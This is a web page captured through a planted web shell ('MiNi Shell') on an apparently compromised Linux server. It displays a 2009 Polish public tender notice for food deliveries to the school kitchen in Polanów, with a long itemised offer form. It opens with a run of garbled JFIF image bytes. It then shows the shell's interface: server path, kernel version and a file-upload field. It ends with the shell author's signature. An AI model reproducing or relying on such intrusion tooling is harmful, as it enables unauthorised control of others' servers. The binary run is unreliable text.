JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/243524-N-2009.html

<p class="kh_header"><b>Polanów: dostawa artykułów żywnościowych do kuchni przy Szkole Podstawowej Polanowie</b><br>
<b>Numer ogłoszenia: 243524 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Polanowie , ul. Wolności 14, 76-010 Polanów, woj. zachodniopomorskie, tel. 0-94 31 88 225, faks 0-94 31 88 225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sp.polanów.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów żywnościowych do kuchni przy Szkole Podstawowej Polanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych do kuchni przy Szkole Podstawowej Polanowie.
1.	Przedmiot zamówienia obejmuje:
        2.1. Dostawę artykułów żywnościowych do kuchni przy Szkole Podstawowej w Polanowie według koszyka asortymentowego  w załączniku Nr 3 do SIWZ
2.7. Szczegółowy opis przedmiotu zamówienia stanowią załączniki
Załącznik Nr 3 do SIWZ  
Załącznik Nr 3 do SIWZ	WZÓR OFERTY 



        



                       



  
 Formularz ofertowy

I. Nazwa i adres Zamawiającego:

Szkoła Podstawowa  w Polanowie, 76-010 Polanów, ul. Wolności 14
II. Nazwa przedmiotu zamówienia :   

Dostawa artykułów żywnościowych do kuchni przy Szkole Podstawowej w Polanowie

III. Tryb postępowania: przetarg nieograniczony.

IV. Nazwa i adres Oferenta: NIP, telefon do kontaktów służbowych
.........................................................
.........................................................
.........................................................
V. Oferuję wykonanie przedmiotu zamówienia wg cen jak w tabeli:
Lp.	Nazwa artykułu	Kod CPV	Podatek Vat w %	Cena netto w przeliczeniu za kilogram, litr lub pęczek 	Cena brutto w przeliczeniu za kilogram, litr lub pęczek	Wielkość lub waga opakowania jednostkowego
1.		Banany	03222110-7
			
2.		Barszcz biały w proszku	15891000-0				
3.		Baton czekoladowy	15842220-0				
4.		Batonik mleczny z czekoladą 28g	15842220-0
			
5.		Boczek świeży	15100000-9				
6.		Boczek wędzony	15131200-7				
7.		Brukselka	03221000-6
			
8.		Brzoskwinia świeża	03222330-5
			
9.		Bułka słodka drożdżowa z kruszonką 100g	15811000-6
			
10.		Bułka tarta	15810000-9				
11.		Bułka zwykła 100g	15810000-9				
12.		Buraki	03221000-6
			
13.		Cebula	03221000-6
			
14.		Chleb krojony	15811100-7				
15.		Chrzan tarty w słoiku	15331110-1				
16.		Cukier biały	15831200-4				
17.		Czekolada 	15842100-3				
18.		Ćwiartka kurczaka świeża 	15112210-1				
19.		Delicje	15820000-2				
20.		Deser czekoladowy z bitą śmietaną 175g	15833100-7
			
21.		Deser waniliowy z bitą śmietaną 175g	15833100-7
			
22.		Dżem truskawkowy	15332296-5				
23.		Fasola łuskana	03221000-6
			
24.		Fasola szparagowa mrożona	03221000-6
			
25.		Filet z dorsza	15211100-1				
26.		Filet z mintaja	15211000-0
			
27.		Filet z pangi	15211000-0
			
28.		Filet z piersi kurczaka	15100000-9
			
29.		Golonka świeża	15100000-9				
30.		Groch łuskany	03221000-6
			
31.		Groszek konserwowy 	15331000-7				
32.		Groszek mrożony	15331000-7				
33.		Gruszka świeża	03222322-6
			
34.		Herbata ekspresowa 	15864100-3				
35.		Jabłka	03222300-6
			
36.		Jajka duże	01240000-1				
37.		Jogurt owocowy 120 ml	15551310-1
			
38.		Jogurt owocowy 150g	15551300-8
			
39.		Jogurt pitny owocowy w butelce plastik 250ml	15551300-8
			
40.		Kakao 200ml kartonik z rurką	15980000-1
			
41.		Kalafior  mrożony	15331100-8				
42.		Kalafior świeży	15331100-8				
43.		Kapusta  czerwona	03221000-6
			
44.		Kapusta biała	03221000-6
			
45.		Kapusta biała młoda	03221000-6
			
46.		Kapusta kiszona	15331461-6				
47.		Karkówka bez kości	15100000-9				
48.		Karkówka z kością	15100000-9				
49.		Kasza gryczana	15613100-9				
50.		Kasza jęczmienna	15613100-9				
51.		Kasza manna	15613100-9				
52.		Ketchup	15871230-5				
53.		Kiełbasa biała	15131100-6				
54.		Kiełbasa grilowa	15131100-6				
55.		Kiełbasa śląska	15131100-6				
56.		Kiełbasa zwyczajna	15131100-6				
57.		Kiwi	03222118-3
			
58.		Knedle z truskawkami	15851000-8
			
59.		Koncentrat  pomidorowy	15331427-6				
60.		Koper suchy	03221000-6
			
61.		Koper świeży (pęczki)	03221000-6
			
62.		Kostka rosołowa	15891000-0				
63.		Kości od karkówki	15100000-9				
64.		Kości od schabu	15100000-9				
65.		Kości wędzone wieprzowe	15100000-9				
66.		Kwasek cytrynowy	15332100-5				
67.		Liść laurowy	03132000-5
			
68.		Łopatka bez kości	15100000-9				
69.		Łopatka z kością	15100000-9				
70.		Magi w płynie	15870000-7				
71.		Majeranek 	03130000-1
			
72.		Majonez	15871273-8
			
73.		Makaron	15851110-2				
74.		Makaron zacierkowy	15851110-2				
75.		Mandarynki świeże	03222240-7
			
76.		Marchew	03221000-6
			
77.		Marchewka z groszkiem mrożona	15331000-7				
78.		Margaryna	15431100-9				
79.		Masło	15530000-2				
80.		Mąka pszenna	15612100-2				
81.		Mąka ziemniaczana 	15612000-1				
82.		Mieszanka owocowa mrożona	15331100-8				
83.		Mięso gulaszowe	15100000-9				
84.		Mięso mielone	15100000-9				
85.		Mleko fermentowane z L caseli Defensis (Actimel)100ml	15551300-8
			
86.		Mleko smakowe wanilia, czekolada 200ml	15982200-7
				
87.		Musztarda	15871250-1				
88.		Nać pietruszki (pęczki)	03221000-6
			
89.		Nać pietruszko suszona	03221000-6
			
90.		Napój owocowy 400ml butelka plastik	15980000-1
			
91.		Nektaryny	03222330-5
			
92.		Ocet	15871110-8				
93.		Ogórki kiszone	15331000-7				
94.		Ogórki konserwowe	15331000-7				
95.		Ogórki świeże	03221000-6
			
96.		Olej roślinny	15411100-3				
97.		Paluszki rybne	15241700-6
			
98.		Papryka mielona	15331136-9				
99.		Papryka świeża	03221000-6
			
100.		Pączek z dżemem min. 80g pieczony beztłuszczowo	15811000-6
			
101.		Pieczarki świeże	03221260-6
			
102.		Pieprz mielony czarny	15872100-2				
103.		Pierogi ruskie	15851000-8
			
104.		Pierogi z mięsem	15130000-8				
105.		Pierogi z serem	15851000-8
			
106.		Piesi z kurczaka	15100000-9
			
107.		Pietruszka  suszona	03221000-6
			
108.		Pietruszka korzeń	03221000-6
			
109.		Pomarańcze	03222200-5
			
110.		Pomidor świeży	03221240-0
			
111.		Porcje rosołowe	15112210-1				
112.		Przyprawa do zup spełniająca normy Vegety	15870000-7				
113.		Pyzy z mięsem	15130000-8				
114.		Ryż biały	03211300-6
			
115.		Schab bez kości 	15100000-9				
116.		Schab z kością	15100000-9				
117.		Seler	03221000-6
			
118.		Ser żółty	15543000-6				
119.		Serca drobiowe	15100000-9
			
120.		Serek homogenizowany waniliowy 150 g	15543000-6
			
121.		Serek homogenizowany waniliowy 80 g	15543000-6
			
122.		Skrzydełka z kurczaka	15100000-9				
123.		Smalec wieprzowy	15412100-0				
124.		Soczek owocowy 200ml kartonik z rurką	15321000-4
			
125.		Sól	15872400-5				
126.		Sól czosnkowa	15872400-5				
127.		Syrop owocowy	15332100-5				
128.		Szczaw konserwowy	15331000-7
			
129.		Szynka wieprzowa świeża	15131410-2				
130.		Śmietana 12%	15512000-0				
131.		Śmietana 18%	15512000-0				
132.		Truskawka mrożona	03222300-6
			
133.		Twaróg półtłusty	15542100-0
			
134.		Wafle mleczne 	15820000-2				
135.		Warzywa mrożone	15331100-8				
136.		Wiśnie w syropie	15332100-5				
137.		Zacierki	15850000-1				
138.		Ziele angielskie	03130000-1
			
139.		Ziemniaki	03221100-7
			
140.		Ziemniaki młode	03221100-7
			
141.		Zupa pieczarkowa	15891400-4				
142.		Żołądki drobiowe	15100000-9
			
143.		Żur w butelkach	15891000-0				
144.		Łącznie wartość
	x				        x


*Cena oferty brutto w koszyku asortymentowym jest ceną ostateczną obejmującą wszystkie koszty i składniki związane z realizacją zamówienia w tym m.in. podatek VAT, upusty, rabaty.

1.	łączna cena netto koszyka asortymentowego: ........................................................... zł.
słownie netto: ......................................................................................................zł.
2.	łączna cena brutto koszyka asortymentowego: ......................................................... zł.
słownie brutto: ....................................................................................................zł.
3.	Termin dostawy od momentu zgłoszenia telefonicznego lub na piśmie - 24 godziny
4.	Dostawca posiada niezbędne środki transportu do przewożenia żywności zgodnie z przepisami sanitarno-epidemiologicznymi.
VI. Deklaruję ponadto że:
1.	Akceptuję wszystkie warunki specyfikacji istotnych warunków zamówienia oraz projekt umowy bez zastrzeżeń,
      Posiadam niezbędne środki transportu zgodne z wymogami sanitarno- epidemiologicznym.
2.	 Uzyskaliśmy wszelkie niezbędne informacje do przygotowania oferty i wykonania zamówienia.
3.	Akceptujemy istotne postanowienia umowy oraz termin realizacji przedmiotu zamówienia podany przez Zamawiającego,
4.	Uważamy się za związanych niniejszą ofertą przez 30 dni od dnia upływu terminu składania ofert,




................................ dn. ...........................                                   .............................................
             (miejscowość i data)                                                                            (podpis osoby uprawnionej.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Rozdział 6.	Warunki udziału w postępowaniu, opis sposobu dokonywania oceny spełniania tych warunków

1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 ustawy Pzp, tj.: 
1)	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności; 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.:
wykonali w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej  jedną dostawę artykułów żywnościowych trwającą co najmniej 6 miesięcy  odpowiadającą swoim rodzajem dostawą stanowiącym przedmiot zamówienia z podaniem wartości, przedmiotu oraz daty i miejsca wykonania. Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że dostawy te zostały wykonane należycie (referencje, protokoły odbioru, itp.), 

3)	nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.
2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
3.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Rozdział 7.	Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków w niniejszym postępowaniu

Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 1 oraz Załącznik Nr 2 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych:
1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, oraz oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> sp.polanów.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła podstawowa w Polanowie
76-010 Polanów
ul. Wolności 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 10:00, miejsce: Szkoła podstawowa w Polanowie
76-010 Polanów
ul. Wolności 14
Sekretariat szkoły pokój Nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com